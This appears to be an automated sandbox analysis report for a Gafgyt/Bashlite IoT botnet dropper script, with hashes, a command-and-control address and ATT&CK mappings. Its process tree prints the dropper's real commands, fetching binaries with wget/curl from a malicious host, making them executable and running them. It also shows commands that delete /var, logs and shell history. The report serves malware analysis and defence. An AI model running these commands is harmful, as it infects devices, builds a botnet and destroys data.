gafgyt | cbac01aa815a84b35d73ba422eddc59b9cae2ad224c76635319f9d3caa9d0f88

Analysis

max time kernel
36s
max time network
38s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
03-02-2025 06:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

2KB
MD5

117c2965eb47f06d0de1d96fd49e4713
SHA1

959ce6a78f5d2c0bad3314409a7dfe2323f98902
SHA256

cbac01aa815a84b35d73ba422eddc59b9cae2ad224c76635319f9d3caa9d0f88
SHA512

9996ca57694330ad1c3ccba35f04dc18581a4687e9fc91ec8af2d0c5cca99abf9b3456cebf6d1cf9225334f5b822a4062760d62bfd4f029d50f98cb3d5d17ad0

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

185.237.15.131:666

Signatures

Detected Gafgyt variant 12 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt
behavioral4/files/fstream-11.dat	family_gafgyt
behavioral4/files/fstream-13.dat	family_gafgyt
behavioral4/files/fstream-15.dat	family_gafgyt
behavioral4/files/fstream-17.dat	family_gafgyt
behavioral4/files/fstream-19.dat	family_gafgyt
behavioral4/files/fstream-21.dat	family_gafgyt
behavioral4/files/fstream-23.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
857	chmod
732	chmod
785	chmod
798	chmod
819	chmod
833	chmod
850	chmod
742	chmod
805	chmod
812	chmod
826	chmod
843	chmod
864	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/jackmymips	733	bins.sh
/tmp/jackmymipsel	744	bins.sh
/tmp/jackmysh4	786	bins.sh
/tmp/jackmyx86	799	bins.sh
/tmp/jackmyarmv6	806	bins.sh
/tmp/jackmyi686	813	bins.sh
/tmp/jackmypowerpc	820	bins.sh
/tmp/jackmyi586	827	bins.sh
/tmp/jackmym86k	834	bins.sh
/tmp/jackmysparc	844	bins.sh
/tmp/jackmyarmv4	851	bins.sh
/tmp/jackmyarmv5	858	bins.sh
/tmp/jackmypowerpc440	865	bins.sh

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	jackmymipsel

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	744	jackmymipsel

Reads CPU attributes 1 TTPs 1 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/77/status	pkill
File opened for reading	/proc/81/cmdline	pkill
File opened for reading	/proc/74/cmdline	pkill
File opened for reading	/proc/11/status	pkill
File opened for reading	/proc/145/status	pkill
File opened for reading	/proc/703/cmdline	pkill
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/8/status	pkill
File opened for reading	/proc/20/status	pkill
File opened for reading	/proc/24/cmdline	pkill
File opened for reading	/proc/77/cmdline	pkill
File opened for reading	/proc/78/cmdline	pkill
File opened for reading	/proc/171/cmdline	pkill
File opened for reading	/proc/250/status	pkill
File opened for reading	/proc/701/cmdline	pkill
File opened for reading	/proc/13/cmdline	pkill
File opened for reading	/proc/sys/kernel/osrelease	pkill
File opened for reading	/proc/333/status	pkill
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/12/status	pkill
File opened for reading	/proc/373/status	pkill
File opened for reading	/proc/1/status	pkill
File opened for reading	/proc/110/cmdline	pkill
File opened for reading	/proc/707/cmdline	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/337/cmdline	pkill
File opened for reading	/proc/695/cmdline	pkill
File opened for reading	/proc/6/status	pkill
File opened for reading	/proc/118/status	pkill
File opened for reading	/proc/119/status	pkill
File opened for reading	/proc/152/status	pkill
File opened for reading	/proc/73/status	pkill
File opened for reading	/proc/678/cmdline	pkill
File opened for reading	/proc/749/status	pkill
File opened for reading	/proc/753/cmdline	pkill
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/24/status	pkill
File opened for reading	/proc/78/status	pkill
File opened for reading	/proc/118/cmdline	pkill
File opened for reading	/proc/361/status	pkill
File opened for reading	/proc/671/cmdline	pkill
File opened for reading	/proc/677/status	pkill
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/752/cmdline	pkill
File opened for reading	/proc/699/cmdline	pkill
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/699/status	pkill
File opened for reading	/proc/700/status	pkill
File opened for reading	/proc/752/status	pkill
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/3/status	pkill
File opened for reading	/proc/424/status	pkill
File opened for reading	/proc/700/cmdline	pkill
File opened for reading	/proc/22/status	pkill
File opened for reading	/proc/9/cmdline	pkill
File opened for reading	/proc/16/cmdline	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/36/cmdline	pkill
File opened for reading	/proc/80/status	pkill

System Network Configuration Discovery 1 TTPs 8 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
747	rm
708	wget
729	curl
733	jackmymips
735	rm
736	wget
737	curl
744	jackmymipsel

Writes file to tmp directory 25 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jackmymipsel	wget
File opened for modification	/tmp/jackmymipsel	curl
File opened for modification	/tmp/jackmym86k	curl
File opened for modification	/tmp/jackmysparc	wget
File opened for modification	/tmp/jackmyarmv4	curl
File opened for modification	/tmp/jackmyarmv5	wget
File opened for modification	/tmp/jackmyarmv5	curl
File opened for modification	/tmp/jackmymips	wget
File opened for modification	/tmp/jackmypowerpc440	curl
File opened for modification	/tmp/jackmyx86	curl
File opened for modification	/tmp/jackmypowerpc	curl
File opened for modification	/tmp/jackmyi586	wget
File opened for modification	/tmp/jackmysh4	curl
File opened for modification	/tmp/jackmyi686	wget
File opened for modification	/tmp/jackmym86k	wget
File opened for modification	/tmp/jackmyarmv4	wget
File opened for modification	/tmp/jackmysh4	wget
File opened for modification	/tmp/jackmyx86	wget
File opened for modification	/tmp/jackmyarmv6	wget
File opened for modification	/tmp/jackmyarmv6	curl
File opened for modification	/tmp/jackmyi686	curl
File opened for modification	/tmp/jackmypowerpc	wget
File opened for modification	/tmp/jackmyi586	curl
File opened for modification	/tmp/jackmysparc	curl
File opened for modification	/tmp/jackmymips	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:703
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmymips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:708
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmymips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:729
- /bin/chmod
  chmod +x jackmymips
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/jackmymips
  ./jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:733
- /bin/rm
  rm -rf jackmymips
  2⤵
  - System Network Configuration Discovery
  PID:735
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmymipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:736
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmymipsel
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:737
- /bin/chmod
  chmod +x jackmymipsel
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/jackmymipsel
  ./jackmymipsel
  2⤵
  - Writes DNS configuration
  - Changes its process name
  - System Network Configuration Discovery
  PID:744
- - /bin/sh
    sh -c "pkill -9 busybox"
    3⤵
    PID:752
  - - /usr/bin/pkill
      pkill -9 busybox
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:753
- - /bin/sh
    sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
    3⤵
    PID:755
  - - /bin/rm
      rm -rf /tmp/bins.sh /tmp/systemd-private-0e2dfaf373a441a5b372b5f4c9ced64c-systemd-timedated.service-zCXT45 /var/backups /var/cache /var/lib /var/local /var/lock /var/log /var/mail /var/opt /var/run /var/spool /var/tmp /var/run/atd.pid /var/run/auditd.pid /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/dbus /var/run/dhclient.enp0s19.pid /var/run/exim4 /var/run/initctl /var/run/initramfs /var/run/lock /var/run/log /var/run/motd.dynamic /var/run/mount /var/run/network /var/run/rsyslogd.pid /var/run/sendsigs.omit.d /var/run/shm /var/run/sshd /var/run/sshd.pid /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/user /var/run/utmp /var/tmp/systemd-private-0e2dfaf373a441a5b372b5f4c9ced64c-systemd-timedated.service-WL3gsD
      4⤵
      PID:756
- - /bin/sh
    sh -c "rm -rf /var/log/wtmp"
    3⤵
    PID:767
  - - /bin/rm
      rm -rf /var/log/wtmp
      4⤵
      PID:769
- - /bin/sh
    sh -c "rm -rf ~/.bash_history"
    3⤵
    PID:771
  - - /bin/rm
      rm -rf "~/.bash_history"
      4⤵
      PID:772
- - /bin/sh
    sh -c "history -c;history -w"
    3⤵
    PID:774
- /bin/rm
  rm -rf jackmymipsel
  2⤵
  - System Network Configuration Discovery
  PID:747
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmysh4
  2⤵
  - Writes file to tmp directory
  PID:749
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmysh4
  2⤵
  - Writes file to tmp directory
  PID:760
- /bin/chmod
  chmod +x jackmysh4
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/jackmysh4
  ./jackmysh4
  2⤵
  PID:786
- /bin/rm
  rm -rf jackmysh4
  2⤵
  PID:789
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmyx86
  2⤵
  - Writes file to tmp directory
  PID:790
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmyx86
  2⤵
  - Writes file to tmp directory
  PID:796
- /bin/chmod
  chmod +x jackmyx86
  2⤵
  - File and Directory Permissions Modification
  PID:798
- /tmp/jackmyx86
  ./jackmyx86
  2⤵
  PID:799
- /bin/rm
  rm -rf jackmyx86
  2⤵
  PID:801
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmyarmv6
  2⤵
  - Writes file to tmp directory
  PID:802
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmyarmv6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:803
- /bin/chmod
  chmod +x jackmyarmv6
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/jackmyarmv6
  ./jackmyarmv6
  2⤵
  PID:806
- /bin/rm
  rm -rf jackmyarmv6
  2⤵
  PID:808
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmyi686
  2⤵
  - Writes file to tmp directory
  PID:809
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmyi686
  2⤵
  - Writes file to tmp directory
  PID:810
- /bin/chmod
  chmod +x jackmyi686
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/jackmyi686
  ./jackmyi686
  2⤵
  PID:813
- /bin/rm
  rm -rf jackmyi686
  2⤵
  PID:815
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmypowerpc
  2⤵
  - Writes file to tmp directory
  PID:816
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmypowerpc
  2⤵
  - Writes file to tmp directory
  PID:817
- /bin/chmod
  chmod +x jackmypowerpc
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/jackmypowerpc
  ./jackmypowerpc
  2⤵
  PID:820
- /bin/rm
  rm -rf jackmypowerpc
  2⤵
  PID:822
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmyi586
  2⤵
  - Writes file to tmp directory
  PID:823
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmyi586
  2⤵
  - Writes file to tmp directory
  PID:824
- /bin/chmod
  chmod +x jackmyi586
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/jackmyi586
  ./jackmyi586
  2⤵
  PID:827
- /bin/rm
  rm -rf jackmyi586
  2⤵
  PID:829
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmym86k
  2⤵
  - Writes file to tmp directory
  PID:830
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmym86k
  2⤵
  - Writes file to tmp directory
  PID:831
- /bin/chmod
  chmod +x jackmym86k
  2⤵
  - File and Directory Permissions Modification
  PID:833
- /tmp/jackmym86k
  ./jackmym86k
  2⤵
  PID:834
- /bin/rm
  rm -rf jackmym86k
  2⤵
  PID:836
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmysparc
  2⤵
  - Writes file to tmp directory
  PID:837
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmysparc
  2⤵
  - Writes file to tmp directory
  PID:841
- /bin/chmod
  chmod +x jackmysparc
  2⤵
  - File and Directory Permissions Modification
  PID:843
- /tmp/jackmysparc
  ./jackmysparc
  2⤵
  PID:844
- /bin/rm
  rm -rf jackmysparc
  2⤵
  PID:846
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmyarmv4
  2⤵
  - Writes file to tmp directory
  PID:847
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmyarmv4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:848
- /bin/chmod
  chmod +x jackmyarmv4
  2⤵
  - File and Directory Permissions Modification
  PID:850
- /tmp/jackmyarmv4
  ./jackmyarmv4
  2⤵
  PID:851
- /bin/rm
  rm -rf jackmyarmv4
  2⤵
  PID:853
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmyarmv5
  2⤵
  - Writes file to tmp directory
  PID:854
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmyarmv5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:855
- /bin/chmod
  chmod +x jackmyarmv5
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /tmp/jackmyarmv5
  ./jackmyarmv5
  2⤵
  PID:858
- /bin/rm
  rm -rf jackmyarmv5
  2⤵
  PID:860
- /usr/bin/wget
  wget http://bins.freesite.host/bins/jackmypowerpc440
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://bins.freesite.host/bins/jackmypowerpc440
  2⤵
  - Writes file to tmp directory
  PID:862
- /bin/chmod
  chmod +x jackmypowerpc440
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/jackmypowerpc440
  ./jackmypowerpc440
  2⤵
  PID:865
- /bin/rm
  rm -rf jackmypowerpc440
  2⤵
  PID:866

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Adversary-in-the-Middle

T1557

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jackmyarmv4

Filesize
121KB

MD5
0a405ebd5dbfda473cb4ea67fb11022e

SHA1
63aa1adc69cfa659eaef618a13b237a5ba99c676

SHA256
25be6a0e7a281425036ca5e32f41044d267f9ce9e7734199e07d47d35ff71329

SHA512
cf715da52e6c708d305b45074816759654380d16ae9fd4256fb7922b5a1eeec3b9c02207b93bcf86be484d4392538f1cb27600da376da04751ad6b237d3d7956

Download Submit
/tmp/jackmyarmv5

Filesize
114KB

MD5
16c719f948532703e99acccf76d2faa3

SHA1
b44cd1659fce47ccc079c07f9b034ef482985ffe

SHA256
ce5da3d0daaa7d8f9ec0ea62ead3fb5a110ec1a6a58cd4229c653883c4d81a84

SHA512
a34f80b6dac32d05a36ddaf7664275d72f1875f658cf05c524583265aea4e25fdf34fdd3c6b3b0a92bc07ed4421b985a0309cafcd2fee07dae570c752fdbc98f

Download Submit
/tmp/jackmyarmv6

Filesize
135KB

MD5
5e4a03f668b36cf458db8120f5fd61a2

SHA1
3c832a0bc244fbf28b7972025c1cc3a6e20e96a1

SHA256
a79e47302aaceccefa752bc0311c60faf0585c9b27e14c8d8c927d476faee724

SHA512
98cf5a25c3422e6bfd7371805f2167ec1da9c4d69ef13d5825bade1142e087f34aed3e73d11904b99334a7d816e56d7a390db316b12e42bddee90dcd2b0a77a8

Download Submit
/tmp/jackmyi586

Filesize
93KB

MD5
2eead00e32c17e8a8b42ae0bd5657b96

SHA1
f2fd0a91faf84ad1a1667d37203d08d30f68a52c

SHA256
e4268bb0b926afb0def833f91ca73145fd6465f38b64215277b9a473c7902c33

SHA512
f6d2be735f54fae4c99e1f3fbc2eaa9a632dfc1e162cf84cb539fab68a0858d40b4dc3f8cf0b9609d5af3ad6f3a8e8f8353ec2184770ecefc974069d7e7dc35e

Download Submit
/tmp/jackmyi686

Filesize
93KB

MD5
608f6186183cc60ee980a3c61ed75657

SHA1
11ff1ae027e903b8346dc96ee3efe89b51a8a870

SHA256
4e2dc2ac640b9a450cabc34f024b66dd02c28ba4ff7553e92e2da05542c9334f

SHA512
5be2f66fe54bd27cd37256b28fc6a9906c4c30c87ecb766a4dc3de0c5a0b0d328879541328b623a094e744a28d167e2bceeafade98cbc7bf4ef26ded06da8217

Download Submit
/tmp/jackmym86k

Filesize
111KB

MD5
8c4076716dc9b9d376b81ee1f9553882

SHA1
b192fac381d8f5883934217e51b04c71a7bb5b6b

SHA256
89df86cca67c48fc5a983b1fd52ce51220b43abbd9eec78ae1a72eebd6cf8995

SHA512
42fc2233dcdbd2ffbce29e81cc8319d3bdcd659eef73f0c3f47937954a7fa55c3477955fb817004cda3376586e151c9fddd14d13543929cd806bc74823652d18

Download Submit
/tmp/jackmymips

Filesize
141KB

MD5
f07907753da39138058eefc527185ac0

SHA1
bf6af9d8c1fbff0f48e73427f887194a02aac844

SHA256
b0ec23f3a680be657e03be5bf279c1f99f12ee356f05bbefd2b562cb92c78d3a

SHA512
224149662ee0dfcc0a008436812479f643f7f10bba3d44be7619a7cf33810327e0ec763ada8a4f3647a575ea962789fc0ec1ee13d48d07e08054abad4930d657

Download Submit
/tmp/jackmymipsel

Filesize
141KB

MD5
a66621dce8bb5463b936b6650d52f918

SHA1
24a1a2af65d9e4b453439e013d360059f21c555a

SHA256
6e3f0a5bd00e6e610efdb0a784354141b44be5055733c68fd6a036f689f9ab03

SHA512
5b4ae51f4d7e7494c97286bf762deb60a088ad72ea6d5c55f11715e22124e08ba285f13d5156ecc32cf3547913ddee1cd6336265a352ff3174bd7edb96640c9e

Download Submit
/tmp/jackmypowerpc

Filesize
106KB

MD5
e02d5792cbcfba013b77203f049e8d48

SHA1
0659308f6099fcca6d5ac0783f976989f3c0464f

SHA256
47761f435515620e8296b30add528960578ab073a0f52cf1021c9901ceb97d09

SHA512
9d57d98bd0b3f8ada78cd684720b0902cead9fc7f1677f9ec2351362f0387fcfdd06b8f0e13a053684c5324912b946df4d4dd807d4d92130d7ee1d68729ab066

Download Submit
/tmp/jackmypowerpc440

Filesize
383B

MD5
c5b7886a10c68a91d995bc1db26f8a1c

SHA1
005cdf83bca301545cabdc8b133519c4e83d0c0a

SHA256
44bf68f78f972505d7956bbe50d60ae75de8b95ef33fd181b2a8fb8aa8dffc21

SHA512
68c3f6868e1fce816fc49a73cf00fc7d9597ecf5998115d3a547337b540082d6d65cbb320b3884dc0cd2fd4b85e5cfb0d8b9f5185bd37ff5e70ecf8aa78755c9

Download Submit
/tmp/jackmysh4

Filesize
102KB

MD5
6f1ea26027b8cd717ebb66dbef209df1

SHA1
1129623c2228408347c84b117db72fe08e0fe551

SHA256
e28b719b64201c9235e2640bd877d86884c1b6e031a9dc536bcb977ba82a61e7

SHA512
be9d639b58cdf72e081cd001c81b718c22d9af482258c2bef75fd7562d4256dc1fb15466b725ba5f37ef19cdf3d00dd4ebf5e46915249b5e2cbbd90c4aca1dc2

Download Submit
/tmp/jackmysparc

Filesize
119KB

MD5
6288cc9f37ea265a1598737fda5ccc1a

SHA1
7b811ae42216a24eda07dc6f448329519823427b

SHA256
8549c5ef4adf358f75339db4241d2a20a3782d21fcc4e2f6a7d06b8d8e886196

SHA512
feaa5b1ccc2d4e8f408011a01095d7f9b759ef6a92950e9fcfd8fd89d28aac98b870b0c9950e649e491a6f1e97483fce5945fab4efceebae4cfb2965216c49b1

Download Submit
/tmp/jackmyx86

Filesize
105KB

MD5
8417b0dbdc08c465ac90bb1111fca242

SHA1
246f21ea454c72ac6e41df489be314e39cbcda0f

SHA256
fe5967d1cc5122824d5628432045d81f0c126ba5b709a3790bf01cf626667f9a

SHA512
fef20df6bfe3a6620fed3f8f68bbd4196eb07f8d5f6728a67cbbc2d7cdba7582d327e49379871fe9d8a074b4758e46f892bbc97a9d6fbbb6435fe56012ae0c22

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads